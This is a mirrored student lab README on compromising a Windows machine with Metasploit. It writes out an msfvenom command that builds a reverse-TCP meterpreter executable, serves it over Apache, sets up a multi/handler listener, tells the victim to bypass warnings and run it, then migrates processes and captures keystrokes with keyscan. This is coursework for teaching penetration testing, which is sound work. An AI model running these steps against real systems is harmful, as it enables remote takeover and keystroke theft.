GithubHelp home page GithubHelp logo

shivaram2525 / compromising-windows-using-metasploit Goto Github PK

View Code? Open in Web Editor NEW

This project forked from gowriganeshns/compromising-windows-using-metasploit

0.0 0.0 0.0 16 KB

Compromising windows using Metasploit

License: GNU General Public License v3.0

compromising-windows-using-metasploit's Introduction

NAME: SHIVARAM M.

REG.NO.: 212223040195

Compromising-windows-using-Metasploit

Compromising windows using Metasploit

Metasploit

Compromising windows using Metasploit

AIM:

To Compromise windows using Metasploit .

DESIGN STEPS:

Step 1:

Install kali linux either in partition or virtual box or in live mode

Step 2:

Investigate on the various categories of tools as follows:

Step 3:

Open terminal and try execute some kali linux commands

PROGRAM:

Find the attackers ip address using ipconfig

EXECUTION STEPS AND ITS OUTPUT:

OUTPUT:

image

Create a malicious executable file fun.exe using msenom command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 -f exe > fun.exe

OUTPUT:

image

copy the fun.exe into the apache /var/www/html folder

image

Start apache server sudo systemctl apache2 start

image

Check the status of apache2

image

Invoke msfconsole:

OUTPUT:

Type help or a question mark "?" to see the list of all available commands you can use inside msfconsole.

Starting a command and control Server use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 exploit

image

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine: http://192.168.1.2/fun.exe The file "fun.exe" downloads.

image

Bypass any warning boxes, double-click the file, and allow it to run.

On kali give the command exploit

image

To see a list of processes, at the meterpreter > prompt, execute this command: ps โ‡’ can see the fun.exe process running with pid 1156

The Metasploit shell is running inside the "fun.exe" process. If the user closes that process, or logs off, the connection will be lost. To become more persistent, we'll migrate to a process that will last longer. Let's migrate to the winlogon process. At the meterpreter > prompt, execute this command:

migrate -N explorer.exe at meterpreter > prompt, execute this command: netstat A list of network connections appears, including one to a remote port of 4444, as highlighted in the image below. Notice the "PID/Program name" value for this connection, which is redacted

image

Post Exploitation The target is now owned. Following are meterpreter commands for key capturing in the target machine keyscan_start Begins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.

image

keyscan_dump Shows the keystrokes captured so far

image

RESULT:

The Metasploit framework is used to compromise windows and is examined successfully.

compromising-windows-using-metasploit's People

Contributors

gowriganeshns avatar shivaram2525 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.